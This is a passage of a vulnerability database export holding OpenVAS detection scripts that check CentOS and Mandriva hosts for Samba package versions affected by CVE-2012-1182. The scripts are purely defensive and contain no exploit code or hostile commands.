FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018561.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881228\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:53:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0466\");\n script_name(\"CentOS Update for samba3x CESA-2012:0466 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba3x'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"samba3x on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC 
IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881179", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881179\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:34:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libsmbclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) 
compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:57:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "description": "Check for the Version of samba", "modified": "2018-01-08T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:831574", "href": "http://plugins.openvas.org/nasl.php?oid=831574", "type": "openvas", "title": "Mandriva Update for samba MDVSA-2012:055 (samba)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for samba MDVSA-2012:055 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in samba:\n\n The RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n 3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\n array length in a manner consistent with validation of array memory\n allocation, which allows remote attackers to execute arbitrary code\n via a crafted RPC call (CVE-2012-1182).\n\n The updated packages have been patched to correct this issue.\";\n\ntag_affected = \"samba on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2,\n Mandriva Linux 2010.1\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:055\");\n script_id(831574);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 09:50:22 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2012:055\");\n script_name(\"Mandriva Update for samba MDVSA-2012:055 (samba)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local 
Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", 
rpm:\"lib64smbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.10~1.2\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc1\", rpm:\"libtalloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.3.12~0.9mdvmes5.2\", 
rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n 
exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc1\", rpm:\"lib64talloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc-devel\", rpm:\"lib64talloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb1\", rpm:\"lib64tdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb-devel\", rpm:\"lib64tdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) 